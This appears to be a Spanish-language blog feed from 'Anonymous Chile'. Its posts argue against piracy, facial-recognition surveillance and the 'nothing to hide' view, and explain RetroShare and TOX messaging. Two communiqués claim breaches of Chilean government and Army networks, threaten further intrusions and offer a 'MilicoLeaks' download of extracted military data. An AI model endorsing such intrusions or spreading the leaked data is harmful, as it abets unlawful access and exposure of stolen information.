Primero, el sistemático no respeto al copyright mina el respeto por todas las licencias que tienen un enorme beneficio táctico para el Software Libre y un factor cada vez más importante para el éxito de la Cultura Libre. Las licencias copyleft como la GPL (Foundation, 2007) o CC-BY-SA (Corporation, s. f.-b) tienen poder sólo porque el copyright lo tiene. Como Stallman ha sugerido (Stallman, 2009), las acciones anti-copyright son también acciones anti-copyleft. Esto no tiene por qué ser un argumento contra los intentos para limitar el copyright. En efecto, pienso que debemos limitar y reducir el copyright. Pero debemos hilar cuidadosamente. En el clima actual del copyright, debemos sopesar los beneficios de promover la violación sistemática de las licencias propietarias con los beneficios de adherir al Software y la Cultura libres.

Segundo, la piratería es fundamentalmente reaccionaria. Parte de su resonancia como un símbolo político viene del hecho de que la piratería representa una manera en que los consumidores de medios pueden luchar contra un grupo de compañías que los han atacado –con demandas judiciales, sistemas DRM, y demonización y propaganda– por compartir en formas que los consumidores piensan como naturales y socialmente positivas. Pero la piratería se enfoca en la reacción antes que en la importancia fundamental de compartir que la conduce. Como resultado, muchos piratas no apoyan, o ni siquiera están familiarizados, con un acercamiento de principios al acceso a la información. Como resultado, muchos militantes piratas que hablan contra el DRM en DVDs estarían felices de usar NetFlix para descargar películas con DRM por US$5 al mes así como lo estarían por descargarlas gratuitamente. Los mejores gritos de guerra no siempre se traducen en los movimientos más robustos.

Tercero, en este foco sobre la reacción, un diálogo acerca de la piratería evita el compromiso con las preguntas difíciles sobre con qué vamos a reemplazar el actual sistema de copyright. Una posición de principios sugiere que es nuestra prerrogativa ética crear modelos alternativos. El movimiento del Software Libre ha triunfado porque creó tal prerrogativa y entonces, lentamente, proveyó ejemplos de alternativas funcionales. Una posición de principios sobre el Software Libre no requirió que se provea un nuevo sistema en funcionamiento inmediatamente, pero hace del desarrollo de acercamientos creativos y sostenibles una prioridad. Atacar al sistema sin siquiera tratar de hablar sobre modelos alternativos de producción no es sustentable. El Software y la Cultura libres piden una revolución. La piratería sólo pide una revuelta.

La piratería, en estos tres sentidos, puede verse como tácticamente imprudente, sin ser necesariamente anti-ética. Al tomar una posición de principios, uno puede construir e ir más allá, del comentario de Richard Stallman. En términos de software y cultura libres, podemos sugerir que la piratería no es éticamente mala, pero que es una manera imprudente de promover el compartir. Sin ser hipócrita, podemos decir “No pienso que la piratería sea anti-ética. Pero tampoco la apoyo”.

Contra la vigilancia masiva: Hasta que la dignidad se haga costumbre

Publicada el 25/03/2020 por Anonymous Chile

Frente a la represión que el Estado chileno ha ejercido sobre la legítima protesta social, nos oponemos a la implementación de tecnologías de vigilancia masiva y reconocimiento facial en el espacio público. Está demostrado que estas tecnologías no nos protegen: su implementación nos vulnera y entrega al Estado capacidades que menoscaban nuestros derechos.

Mientras que en mayo del año pasado la ciudad de San Francisco (cuna de este tipo de tecnologías) prohibió la utilización de tecnología de reconocimiento facial en espacios públicos, la Unión Europea pondera seguir este camino o al menos implementar una moratoria de cinco años a la utilización de estos mecanismos en espacios públicos; en Chile se ha anunciado por Mercado Público una licitación para la compra de equipamientos para un “Sistema de Teleprotección Nacional” por más de 14 mil millones de pesos que incluye tecnología de reconocimiento facial. Este sistema forma parte del programa “Calle Segura”, la iniciativa más ambiciosa para aumentar de capacidad de vigilancia del Estado desde la vuelta a la democracia.

En el contexto de protesta social en el que el país se encuentra sumido desde octubre del año pasado y ad portas de un proceso constituyente, donde las necesidades de expresarse públicamente y manifestarse pacíficamente mantendrán movilizada a parte importante de la población: ¿Qué podría salir mal?

Las razones que han llevado a la prohibición o moratoria de uso del reconocimiento facial en espacios públicos son claras y compartidas: este tipo de tecnologías entregan al poder político una capacidad ilimitada, desproporcionada e injustificada para identificar, perfilar y vigilar a sus ciudadanas; aún cuando la ejecución de estas actividades es incompatible con el Estado democrático de Derecho.

La paradoja del reconocimiento facial

Una de las principales críticas a las tecnologías de reconocimiento facial es su tasa de falsos positivos, es decir, el porcentaje de veces que el sistema reconoce de forma equivocada al afectado. La policía londinense reportó que un sistema de estas características identificó erróneamente a los individuos en un 92% de los casos, en Nueva York se obtuvo un 80% de falsos positivos y en nuestro país, el sistema del Mall Plaza resultó en un 90% de casos erróneos ¿Existe alguna otra industria que pueda mantenerse lucrativa con esos resultados?

Más allá de su efectividad -y la cuestionable justificación económica de esa inversión por el Estado, frente a las múltiples demandas sociales que requieren urgente atención- lo que resulta realmente espeluznante del reconocimiento facial, para aquellos que amamos y defendemos la libertad, es que estamos ante una tecnología que entrega una capacidad completamente desproporcionada al Estado y le permite ampliar su poder político para identificar a sus ciudadanas en el espacio público, un verdadero estado policial de control que trata a las personas como permanentes sospechosas. Este es el Estado del que nos habló Orwell en 1984.

Hoy estamos, entonces, ante una paradoja. El reconocimiento facial es una mala inversión para los recursos del Estado porque no sirve -ya se ha demostrado que es incapaz de entregar el resultado que promete- y el precio lo pagarán con sus derechos y libertades aquellos erróneamente identificados por el sistema. Aún si fuese capaz de alcanzar su objetivo, las consecuencias en el ejercicio de los derechos de las personas serían irreversiblemente más graves; es por esto que la implementación de este tipo de tecnologías resulta incompatible con un Estado de Derecho.

En el peor de los momentos

El anuncio de este sistema de vigilancia masiva ocurre en un momento particular, a la mitad de la revuelta social y política más importante que ha vivido Chile en los últimos 30 años. En un escenario en donde al menos tres organismos internacionales han constatado la existencia de gravísimas y generalizadas violaciones a los derechos humanos de la población.

La implementación de este sistema de vigilancia masiva se produce, entonces, en un contexto en el que se constata una progresiva criminalización al legítimo derecho de la población a la protesta social. El sistema propuesto entrega una herramienta tecnológica adicional para acrecentar la capacidad de control del Estado sobre la expresión y la manifestación, como un ejercicio de poder sin contrapesos ni obligación de rendición de cuentas en su uso. Si previo al estallido social vivimos situaciones como la Operación Huracán o la vigilancia policial revelada por el Paco Leaks ¿qué garantiza que un sistema de vigilancia masivo con reconocimiento facial no será utilizado para perfilar a dirigentes sociales, perseguir a activistas, medios independientes u hostigar a oponentes políticos?

Las bases de licitación son claras en entregar al sistema la mayor discrecionalidad y arbitrariedad posible, describiendo las cámaras como un mecanismo legítimo incluso para perseguir “incivilidades”. En otras palabras, se proponen como una solución para perseguir conductas que van desde cometer delitos hasta botar papeles en la calle, contraviniendo uno de los principios básicos de la disciplina jurídica de protección de datos personales: el principio de proporcionalidad.

Las bases de licitación son además ambiciosas, pero poco precisas. Se establece que el sistema de vigilancia tiene que ser capaz de reconocer rasgos faciales, patrones de comportamiento y contar con algoritmos de aprendizaje de máquinas (machine learning); sin embargo, no establece definición alguna de qué parámetros técnicos deberán cumplir ni provee información acerca de los datos que serán usados para su entrenamiento. Tampoco hay mención a cualquier mecanismo de control o resguardo de los derechos de las personas sujetas a este sistema de vigilancia masiva.

La pretensión del gobierno por generar mecanismos de vigilancia masivos en espacios públicos se basa en una premisa errada que nuestros tribunales superiores de justicia han sido claros en descartar: que “no existe” la privacidad en el espacio público. Claro que las personas no gozan del mismo nivel de privacidad en la calle que en la sala de estar de sus casas, pero eso no quiere decir que uno renuncie totalmente a la privacidad al cruzar el umbral de la puerta.

Y es que la privacidad y el anonimato son además condiciones necesarias para el ejercicio de otros derechos fundamentales, como la libertad de expresión, el derecho a reunión, petición, la libertad de culto y la no discriminación. De esta forma la implementación de sistemas de vigilancia masiva genera un efecto inhibidor donde, por miedo a represalias ulteriores, las personas podrían sentirse presionadas a no ejercer sus derechos o ejercerlos de forma limitada.

¿Podrán los chilenos seguir manifestándose con tranquilidad y libertad sabiendo que sus rostros están siendo identificados y que cada uno de sus patrones de comportamiento están siendo analizados por el mismo gobierno que los reprime? La respuesta es obvia.

Llamado a la acción

Desde Anonymous Chile nos oponemos a la implementación de este sistema de vigilancia incompatible con el Estado democrático de Derecho, que vulnera los derechos fundamentales de la población.

La Subsecretaría de Prevención del Delito debe rendir cuenta a las chilenas de su actuar, y es por eso que tal como lo hemos hecho nosotros, invitamos a todos nuestros lectores a utilizar el mecanismo de acceso a la información pública para requerir información de cómo este plan de vigilancia masiva pretende ser implementado y les afecta. Para ello les compartimos un modelo de solicitud que pueden bajar acá. La solicitud se debe ingresar en el portal de transparencia de la Subsecretaría de Prevención del Delito, de forma que exijamos al gobierno transparentar los detalles de este sistema de vigilancia masiva a todas sus ciudadanas interesadas en proteger el respeto de los derechos humanos que les hizo salir a la calle en 2019: para exigir que la dignidad se haga costumbre.

126 comentarios

¿Privacidad? Yo no soy nadie, no tengo nada que esconder

Publicada el 22/12/2019 - 14/10/2021 por Anonymous Chile

Argumentar que uno no se preocupa por el derecho a la privacidad, ya que no tienen nada que ocultar, no es diferente a manifestar que no importa la libertad de expresión porque uno no tiene nada que opinar

Edward Joseph Snowden – 29 de Mayo del año 2015

Estamos siendo observadxs. Tanto entidades privadas como aquellas financiadas por los gobiernos están monitorizando, analizando, estudiando y registrando todas tus actividades en la red, vía telefónica, en tu vida diaria, absolutamente en todo momento, inclusive cuando duermes. ¿Pero que podría importar eso si no tenemos nada que esconder? Quien nada hace nada teme, decían por ahí. Pero si pensamos eso, primero hagámonos la siguiente pregunta: Si no tenemos nada que esconder, ¿por qué no entregamos públicamente el registro de todas nuestras llamadas telefónicas, nuestros mensajes de texto, historial de navegación web, aplicaciones instaladas y utilizadas en nuestros dispositivos y ubicación geográfica en todo momento a tiempo real? Si no nos interesa nuestra privacidad, ¿cómo nos sentiríamos un día si al salir de nuestros hogares encontramos a alguien hurgando en nuestra basura laboriosamente uniendo las notas y documentos rotos nuevamente? Nadie sabe lo que tiene hasta que lo pierde, creemos que tenemos privacidad pero nos sentimos muy intimidados cuando nos enteramos de todo el espionaje y vigilancia sistematizada que gobiernos, corporaciones y empresas imponen y ejercen sobre población inocente sin una justificación legítima y válida, y en verdad todo este debate deja de ser tan divertido cuando lo pensamos de esta manera viendo la realidad del mundo en el que vivimos.
Seguir leyendo «¿Privacidad? Yo no soy nadie, no tengo nada que esconder» →

1 comentario

Comunicado de Anonymous Chile para las autoridades, el gobierno y pueblo chileno

Publicada el 17/12/2019 - 19/12/2019 por Anonymous Chile

Desde hace 2 meses atrás, el 18 de Octubre del 2019, niñxs, jóvenes e inclusive adultxs mayores, pertenecientes a las distintas regiones de Chile y clases sociales, han demostrado su descontento ante el sistemático y reiterado abuso, control, manipulación y desigualdad del sistema neoliberal impuesto en el país en tiempos de dictadura y avalado por los poderes oligárquicos, cleptocráticos, plutocráticos y teocráticos que los han sucedido, fomentando la iniquidad y la injusticia social.

Anonymous comenzó como un movimiento a favor de la libertad de conocimiento, de informarse, expresarse y opinar libremente mientras no se invada el espacio privado y personal de 3eros. Lamentablemente, hemos visto cómo los medios de comunicación, entidades, instituciones y organizaciones han comenzado a censurar cualquier información que entorpezca sus propósitos malévolos, en un sistema que castiga a quienes buscan abogar por la verdad. Y no sólo hemos visto eso. Nos ha dolido cada violación a las libertades individuales, cada golpe, cada lacrimógena, cada perdigón disparado, cada intento de represión de un pueblo que sólo busca que sus demandas sociales sean escuchadas. Nos ha desgarrado cada mutilación, cada ojo perdido, cada manifestante siendo detenido por las fuerzas represoras del estado autoritario, dictatorial y patriarcal del Presidente Sebastián Piñera Echeñique. Y peor aún, hemos llorado muertes de compatriotas que sólo aclamaban por su derecho a una vida digna y el deseo de vivir en paz, libertad, un país donde se respete su dignidad y derechos como ser humano. Dicho esto así, nuestra ideología de lucha es la siguiente:

  • Anonymous no es político ni religioso, cualquiera de esas discusiones están fuera de lugar. No interviene en la política partidaria de cada país. No esta a favor ni en contra de ningún presidente o candidato político y tampoco interviene en la política interna.
  • Anonymous pueden coexistir con miembrxs ciudadanxs de un mismo país pertenecientes a ideologías o signos partidarios distintos, tomando como base de la coexistencia la filosofía de Anonymous.
  • Nuestro territorio es el ciberespacio, en el cual no hay naciones ni gobiernos.
  • Todo miembro de Anonymous acepta la neutralidad de la red.
  • Anonymous considera la armonía entre el ser humano y el medio ambiente, forjándose como un protagonista consciente de su entorno y no un mero espectador o consumidor.
  • Anonymous plantea poder sacar a la luz y colocar en la mesa los temas que la gente quiere obviar, porque callar ante un delito nos hace cómplices, debemos sacar la voz y luchar por cambiar el pensamiento de la sociedad, totalmente conforme con lo que hacen y representan. Anonymous es la voz de los sin voz.
  • Anonymous no avala ni avalará actos violentos contra personas, animales u objetos. Así como tampoco ninguna forma de discriminación racial, religiosa, sexual o de nacionalidad. Todo acto de violencia física contra personas animales u objetos no es producido por Anonymous y quien los hace esta fuera de orden, asumiendo su responsabilidad.
  • Ser Anonymous no te da derecho a la impunidad.
  • Esta ha de ser una resistencia sin líderes. Cada uno siendo soberano de su opinión y manifestándola, después de tomar una decisión informada.
  • Creemos que la libertad es un derecho básico del ser humano, inalienable e intransferible y que dicha libertad se sustenta en la colaboración y solo se limita a no interferir en la libertad de otro ser humano, dañando a su prójimo o sus posibilidades de existencia.
  • Ningún ser vivo debe ser esclavo de otro, física o mentalmente. Promovemos la libertad de pensamiento como escudo ante el dominio por la ignorancia.
  • Los recursos naturales son patrimonio de la humanidad, ningún gobierno, corporación o persona puede privar a otra de su uso, disfrute y cuidado, o atentar contra los mismos, en detrimento de intereses particulares.
  • Libertad-Igualdad-Fraternidad, es el manifiesto principal de nuestra lucha.
    Si te reconoces en estos principios y quieres unirte, buscanos y nos encontrarás, pues todos somos Anonymous, quienes comparten nuestras ideas y quiera unirse a la legión. Levanta nuestras banderas sin miedo, sin tener conocimientos en computación o en esta era digital, puesto el conocimiento es poder y el poder nos hace fuertes, ayudanos a contribuir en un mundo más justo, un mundo donde los que no tienen voz se alcen, manifiesten su opinión en libertad del mismo.

Como Anonymous Chile no podemos hacer vista gorda ante tanta injusticia evidente y las extremas vulneraciones a los derechos humanos. Creemos que los recursos deben ser repartidos en forma equitativa y no como privilegio de unos pocos, que nuestra tierra, nuestro pueblo y sus derechos sean respetados y defendidos tanto como la propiedad privada que durante 3 décadas continuas ha gozado de privilegios y anhelamos que el pueblo de Chile tenga derecho a la transparencia de las acciones cometidas por empresarios, gobernantes y sus entes represivos, personificados en Carabineros de Chile, Policía de Investigaciones y FFAA.

Criticamos el actuar del gobierno, de empresarios y de todos los partidos políticos que han corrompido la ética, la moral y la justicia con malas prácticas, actuando como cómplices de un sistema que causa muerte, hambruna, destrucción y sufrimiento. Exigimos que se escuchen las demandas sociales, exigimos una nueva constitución y asamblea constitucional que permita al pueblo decidir por si mismo sobre su tierra y su futuro sin el intervencionismo de partidos políticos, élites ni influencias económicas. Exigimos dignidad para todxs, sin importar raza, etnia, religión, ideología o clase social. Exigimos que la justicia procese a todxs aquellxs responsables, ya sea autorxs intelectuales o materiales, de cada acto de violencia, tortura, mutilación y asesinato llevado a cabo por agentes de orden y fuerzas de la ley. Lucharemos por destruir la doctrina del terror impuesta sobre la ciudadanía. No toleraremos la impunidad ni la violación de los derechos humanos.

El pueblo no está en guerra, sólo esta unido luchando por exigir el derecho a vivir en paz. Por eso lucharemos en primera línea por la gente, velando en pro de la seguridad y dignidad de cada uno de nuestrxs compatriotas. Nuestras filas ya han vulnerado sistemas de defensa, redes internas, privadas y secretas del gobierno y múltiples instituciones o entidades dependientes de este, lo hicieron hace años y lo seguirán haciendo mientras las exigencias del pueblo de Chile no sean escuchadas. Actuaremos en defensa del pueblo, a cualquier precio.

Somos Anonymous.
Somos Legión.
No olvidamos,
no perdonamos.
Espérennos.

78 comentarios

MilicoLeaks: Anonymous Chile ataca al Ejército

Publicada el 14/12/2019 - 05/08/2021 por Anonymous Chile

SIN JUSTICIA NO HAY PAZ

¡Libertad para lxs presxs políticxs en Chile!
¡Justicia para lxs mutiladxs, torturadxs y asesinadxs por el Estado de Chile!

No más impunidad para los verdaderos criminales: Sebastián Piñera, Andrés Chadwick, Rodrigo Ubilla, Mario Rozas, Javier Iturriaga y todos los responsables por lx(s) asesinatos, torturas, violaciones, mutilaciones, represión indiscriminada y sin piedad ejercida por las fuerzas de la ley y poderes del estado contra los derechos humanos en Chile.

¡No más pacxs ni milicxs en las calles!
¡Exigimos y demandamos respeto a nuestra dignidad como seres humanxs!
¡RENUNCIA PIÑERA!

Por décadas hemos sido gobernadxs por despotas políticxs, corruptxs y mitómanxs. Nos alimentan con sobras, mientras ellxs disfrutan del banquete. Y las pocas migajas que dejan escapar están masticadas y sin sabor.

Nos tuvimos que tapar la cara para que nos vieran, y ahora nos llaman criminales. Pero son ellxs quienes nos declaran la guerra, son ellxs quienes nos asesinan, nos torturan, nos violan, nos mutilan, nos manipulan, nos controlan y nos mienten. Y la culpa no era nuestra, donde estábamos ni cómo vestíamos.

En respuesta, Anonymous Chile ha arremetido contra el Ejercito y Fuerzas Armadas del Estado y el Gobierno de Chile, extrayendo así una voluminosa cantidad de información que expone detalles sobre la infraestructura militar del país en disputa:

Descarga MilicoLeaks

Estamos cansadxs, agotadxs, asqueadxs, angustiadxs, indignadxs, enfurecidxs, emputecidxs y enrabiadxs,
Pero más unidxs que nunca.
Somos lxs que sobran.
Somos lxs olvidadxs.
Somos lxs de abajo apuntando a lxs de arriba.
Somos legión.

Ellxs son lxs violadorxs.
Ellxs son lxs delincuentes.
Ellxs son lxs criminales violentxs y asesinxs.

¡Nos vemos en las calles!

Comunicaciones seguras mediante F2F con Retroshare y TOX: Concepto y teoría

Publicada el 10/12/2019 - 19/10/2021 por Anonymous Chile

Desde los inicios del Internet con ARPANET en los años 60s siempre se pensó bajo un concepto de cliente-servidor, es decir un(a) usuarix se conecta o comunica con una entidad que brinda un(os) servicio(s) especifico(s) o determinado(s) dentro de una misma infraestructura y en una misma plataforma centralizada.

Client-server network architecture

¿Pero qué tal si además de solicitar aquél servicio(s) dichx usuarix al mismo tiempo también pudiese brindarlo, entregarlo y compartirlo con otrxs? Así nace P2P (Peer-to-Peer, o Par a Par en español). P2P es un modelo de red en donde el/los servicio(s) y la información no se encuentra(n) almacenadx(s), gestionadx(s), controladx(s) y administradx(s) en un único lugar sino que es/son brindadx(s), entregadx(s) y compartidx(s) libremente por todxs quienes lx(s) solicitan, llamándose estxs últimos como «nodos», «pares» o «amigxs», que se refiere a cada usuarix conectado a dicha red. ¿Qué genera esto? Descentralización, no dependemos de un único punto para acceder a la información o el/los servicio(s) requeridx(s).

Peer-to-Peer network architecture

Si no dependemos de un único punto, porque la información o el/los servicio(s) es/son brindadx(s), entregadx(s) y compartidx(s) por muchos nodos, pares o amigxs siendo almacenadx(s) y alojadx(s) por una cantidad indeterminada de usuarios arbitrarios dentro de la red que también comparten y se comunican mediante la misma, ¿cómo sabemos a quién o en donde solicitar la/el/los susodichx(s) información o servicio(s)? Por la DHT (Distributed Hash Table, o también Tabla de Hash Distribuida en español). La DHT es como el DNS en P2P y consiste en una base de datos distribuida, abierta y compartida libremente por toda la red P2P que le compete y su principal objetivo radica en mantener un registro actualizado de todos lxs usuarixs y nodos conectados con sus respectivas direcciones IP (como es el caso de Torrent y por ello se recomienda el uso de VPN con protocolo UDP en tales situaciones) y la información o el/los servicio(s) que están ayudando a almacenar, alojar, distribuir, brindar, entregar y compartir cada uno de ellxs así como la/el/los información y servicio(s) brindadx(s), entregadx(s) y compartidx(s) por toda la red en disputa, el tipo de material que sea y su peso (memoria virtual en almacenamiento de datos digitales en internet, una computadora o red de ellas). De esa forma, cuando unx(s) usuarix(s) desea(n) solicitar, buscar, conectar, consultar, acceder a o comunicarse con algún(xs) servicio(s) o plataforma(s) determinadx(s), primero consultan a la DHT para saber en donde se encuentra alojado y por quiénes o cuáles nodos el mencionado es compartido, distribuido y servido para toda la red.

¿Y para qué sirve? Según la llamada Triada de Seguridad dentro del campo de la Ciberseguridad o la Seguridad de la Información, dicho modelo garantiza sin lugar a dudas y de manera infalible la integridad y la disponibilidad de la información inclusive aunque el autor original de ésta ya no exista dentro de la mencionada red.

Como podremos apreciar y hemos mencionado anteriormente, tenemos integridad y disponibilidad. ¿Qué nos falta? Confidencialidad. Para ello nace el P2P anónimo y su implementación más conocida es el F2F (Friend-to-Friend, o también Amigo a Amigo en español). El P2P anónimo se trata de una red P2P en donde la dirección IP de cada usuarix es oculta y cifrada para los demás pares, nodos y amigxs de la red, por lo que éstx(s) es conocidx(s) bajo un hash variable, aleatorio por cada vez que se conecta, único para cada usuarix y la(s) información y comunicacion(es) viajan protegida(s) bajo cifrado asimétrico, híbrido, de curva elíptica, en flujo, por bloques y/o E2E (Extreme-to-Extreme, o Extremo a Extremo), por lo cual así no es posible interceptar dicha comunicación, conocer o rastrear a lxs interlocutorxs de la misma u obtener información con detalles y especificaciones de sus equipos. Un ejemplo de esto son las redes obscuras de I2P, CJDNS y Freenet.

Frente a esto, F2F es una implementación del mencionado P2P anónimo que permite una red invisible, indetectable, cerrada, cifrada, privada y anónima en donde solamente pueden ingresar personas bajo autorización previa de lxs participantes de la susodicha y que se encuentren conectadxs a la red mediante un código o clave de acceso o de lo contrario ni siquiera es posible encontrarla ni detectarla ya que es en lo absoluto desconocida para todo el resto de Internet o quienes no participan en ella, como por ejemplo algo similar al P2P privado. En otras palabras, una nueva Internet totalmente cerrada, privada y aislada de la misma, como una VPN (Virtual Private Network, o también Red Privada Virtual), excepto que ésta última no sigue el modelo Par a Par (P2P), sino que por el contrario, funciona y opera bajo una estructura cliente-servidor, por lo que no es una invisible ni indetectable como F2F.

Por otra parte ahora en consecuencia, RetroShare es un cliente F2F que permite conectarse y comunicarse con estas redes cerradas, cifradas, privadas y anónimas, mientras que TOX es un protocolo que implementa el mismo concepto y funcionamiento de F2F, y por consiguiente también de P2P anónimo ya que como sabemos F2F es una implementación del mismo. No obstante, como hemos mencionado, TOX es un protocolo y por tanto requiere de un cliente (interfaz o aplicación de escritorio para interactuar con la plataforma que opera sobre dicho protocolo), del cual existen bastantes que pueden encontrarse en Internet e instalarse de múltiples formas según sea el caso del sistema operativo utilizado. Poniendo todo esto en un metafórico ejemplo, no necesitamos subir la montaña para no accidentarnos en el mar, sino que podemos ir a una isla pudiendo gozar de los detalles y delicias del mar mientras disfrutamos de la seguridad, tranquilidad y privacidad de nuestra isla sin que nadie se entere, pueda vernos ni descubrir en donde nos encontramos o qué hacemos.

En efecto, para instalar los susodichos en disputa, primero nos dirigimos a sus respectivos sitios web de RetroShare y TOX (siguiendo cada hiperenlace, encontrarán la página oficial de los respectivos proyectos en donde, en el caso de TOX, sugieren varios posibles clientes para elegir si no se desea buscar algo personalizado en Internet), donde podemos descargar el binario precompilado como en Windows (RetroShare/qTox para arquitecturas de 32 y 64 bits y uTox para ambas arquitecturas), TOX en Android y iOS, también Mac OSX (Retroshare/qTox y uTox) y algunos casos en GNU/Linux (RetroShare/qTox), o en éste último compilar todo desde 0, como es el caso de RetroShare por ejemplo, y también instalar desde los repositorios, como es el caso de TOX en Debian GNU/Linux (qTox/uTox) y Arch Linux (qTox en el repositorio oficial de la comunidad/qTox en el repositorio de AUR/uTox en el repositorio oficial de la comunidad/uTox en el repositorio de AUR/Toxic en el repositorio oficial de la comunidad/Toxic en el repositorio de AUR/Toxygen en el repositorio de AUR/Ricin en el repositorio de AUR/Venom en el repositorio de AUR/Ratox en el repositorio de AUR/Complemento de TOX para WeeChat en el repositorio de AUR y Complemento de TOX para Pidgin en el repositorio de AUR), además desde el mismo AUR («Arch User Repository», en inglés, o «Repositorio de Usuarix de Arch» en español) también se puede instalar RetroShare.

Comandos de instalación de paquetes en GNU/Linux y derivados

Arch Linux

sudo yay -Syu nombre-de-paquete-1 nombre-de-paquete-2…

Debian GNU/Linux

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install nombre-de-paquete-1 nombre-de-paquete-2…

Luego finalmente ejecutamos los nuevos softwares instalados desde el menú de aplicaciones o la terminal de comandos, que abrirá una ventana en GUI, y con ello podrán apreciar una interfáz interactiva que los guiará por el camino para comunicarse de forma segura, anónima y descentralizada sin servidores ni medios de control que intercepten o manipulen la información y datos transferidos.

Sin otro particular, nos despedimos dejándoles los repositorios GIT de las mencionadas aplicaciones que nos convocan: Retroshare y TOX.

Mal de ojo: vigilancia y reconocimiento facial en Latinoamerica

Publicada el 07/12/2019 - 03/08/2021 por Anonymous Chile

“Me podrían haber arruinado la vida; a mí y a mi familia”. Esa es la reflexión que hace Guillermo Ibarrola frente a la cámara de A24, tras ser puesto en libertad después de estar seis días detenido por un crimen que no cometió, víctima de una pesadilla tecno-kafkiana.

Mientras se encontraba en Retiro, la principal terminal de omnibuses de Buenos Aires, dos policías se acercaron a Ibarrola y lo detuvieron. El sistema de reconocimiento facial que desde abril de 2019 opera en la capital argentina lo había identificado como responsable de un robo ocurrido en 2016 en Bahía Blanca.

Pero Ibarrola nunca había estado en Bahía Blanca ni tampoco había participado de ningún delito. El sistema había cometido una equivocación que solo fue enmendada seis días más tarde, mientras estaba siendo trasladado a una cárcel provincial. Mientras se encontraba detenido, Ibarrola intentó explicar que debía tratarse de un error. No importó, la máquina había dado ya un veredicto.

La implementación de sistemas de identificación biométrica – y particularmente de reconocimiento facial – ha sido uno de los puntos más debatidos durante los últimos años en la intersección entre tecnología y derechos fundamentales. Las promesas de exactitud, precisión y diligencia con las que se ha querido promocionar este tipo de tecnologías ha encontrado varias respuestas favorables entre los gobiernos y entidades estatales en América Latina, que suelen publicitar con gran pompa los esfuerzos realizados por incorporar estas técnicas a sus actividades, como símbolo de modernización.

Sin embargo, la experiencia internacional ha mostrado que las tecnologías de reconocimiento facial conllevan una serie de problemáticas difíciles de sortear y que las autoridades rara vez mencionan a la hora de anunciar públicamente la intención de poner en funcionamiento un sistema de este tipo. A la dificultad in-herente a proteger debidamente datos altamente sensibles como los biométricos, se suma el alto porcentaje de falsos positivos arrojado por distintos sistemas de reconocimiento facial en funcionamiento alrededor del mundo, particularmente cuando se trata de personas de tez oscura, personas trans o no binarias.

En un experimento realizado por la American Civil Liberties Union (ACLU) el software de reconoci-miento facial desarrollado por Amazon reconoció erróneamente a 28 congresistas estadounidenses como autores de algún crimen, con un número desproporcionadamente alto de personas de color entre ellos. El proyecto Gender Shades, desarrollado por la investigadora Joy Buolamwini, demuestra que las tecnologías de reconocimiento facial disponibles en el mercado tienen grandes dificultades identificando mujeres de color, y obtienen sus mejores resultados cuando los sujetos analizados son hombres blancos.

Al mismo tiempo, la promesa de un sistema de reconocimiento facial completamente eficaz – imposible como es – no evoca precisamente un escenario idílico, sino más bien una distopía orwelliana, donde cada movimiento puede ser observado, registrado y escudriñado. Es por ello que, en una de sus editoriales, el periódico inglés The Guardian catalogó al reconocimiento facial como un peligro para la democracia y cuatro ciudades estadounidenses – Oakland, San Francisco Berkley y Somerville, Massachusetts- la han prohibido.

A todos los problemas anteriormente mencionados, en América Latina se suma un actuar muchas veces opaco y una interpretación antojadiza de leyes que no fueron concebidas para lidiar con las implicancias de este tipo de tecnologías, configurando un escenario de altas incertezas y muchas zonas grises, particularmente en relación con la defensa de los derechos fundamentales de las personas sometidas a estos sistemas. Estos problemas se agudizan cuando la tecnología es utilizada en tareas relativas a la persecución criminal y el orden público, donde la información muchas veces se vuelve inaccesible, escudada bajo leyes de seguridad nacional que le permiten funcionar sin control. Al respecto, los casos de Paraguay y Argentina son ilustradores.

En marzo de 2019, el Gobierno de la ciudad de Buenos Aires anunció la implementación de un sistema de reconocimiento facial para detectar prófugos y rebeldes de todo el país. Se trata de una nueva adhesión al sistema de biovigilancia pública de la ciudad, que ya contaba con una extensa red de cámaras, a algunas de las cuales se les ha adosado un software de reconocimiento facial, particularmente aquellas dispuestas en terminales y estaciones del tren subterráneo, el Subte.

“Sabemos que son alrededor de 200 cámaras que están usando ese software. El Gobierno no dice en qué estaciones están ni en qué cámaras están dentro de se subte. Desde ADC hicimos un pedido de acceso a la información para que nos informen eso y nos negaron esa información en base a razones de seguridad”, explica Eduardo Ferreyra de la Asociación por los Derechos Civiles (ADC).

Algunas de las materias incluidas en el acceso a la información pública realizado por ADC dicen relación con la legalidad de la iniciativa y los protocolos de control que lo rigen, los aspectos técnicos del sistema y la composición de la base de datos utilizada. En opinión de la organización, las respuestas no fueron suficientemente precisas.

El caso paraguayo es similar. Desde mediados del año pasado, el centro histórico de Asunción, el aeropuerto de la ciudad y las terminales de buses está siendo vigiladas por un sistema de reconocimiento facial donado por la Comisión Nacional de Telecomunicaciones (CONATEL) al Ministerio del Interior. “El ente regulador de comunicaciones tiene un fondo, que se llama Fondo Universale, que es exclusivamente para conectividad. Y, extrañamente, lo están utilizando para compras de seguridad y donando a otras instituciones del Estado, a través de convenios interinstitucionales”, explica Maricarmen Sequera, directora ejecutiva de TEDIC.

Puesto que CONATEL no forma parte del convenio de contrataciones públicas, la licitación se realizó de forma cerrada. Ante la oscuridad con la que se estaba operando, TEDIC interpuso un recurso de acceso a la información pública con una serie de preguntas respecto al funcionamiento del sistema, incluyendo la geolocalización de las instalaciones, la base de datos utilizada y también respecto a la evaluación de impacto previa.

“La respuesta a esa solicitud de acceso fue parcial – advierte Sequera – Nos pasaron cierta información, pero era información que a la que ya habíamos accedido y no realmente sobre las preguntas que hicimos. Entonces apelamos y en la primera instancia el Ministerio del Interior dice que la otra información no la pueden dar por cuestiones de seguridad nacional”.

Sin embargo, la ley paraguaya establece que para que una información sea reservada debe ser expresamente establecida por ley, no siendo este el caso. “Metieron este tema dentro de una mesa de seguridad nacional que tiene el Sistema de Inteligencia y con eso justificaron que todo lo que se discuta ahí es de seguridad nacional. Apelamos, y en la segunda instancia de nuevo los tres jueces aprobaron la posición del ministerio del interior, sin argumento”, declara Sequera.

Esta reticencia a transparentar información relativa al funcionamiento de los sistema de reconocimiento facial es preocupante, pues, como acota Leandro Ucciferri en un texto a propósito de la solicitud de transparencia realizado por ADC, “El reconocimiento facial, en particular cuando se lo usa con fines de investigación criminal, tiene el potencial de interferir directamente con derechos como la privacidad, la libertad de expresión, reunión y asociación, la no discriminación y garantías constitucionales como el de- bido proceso y la presunción de inocencia”.

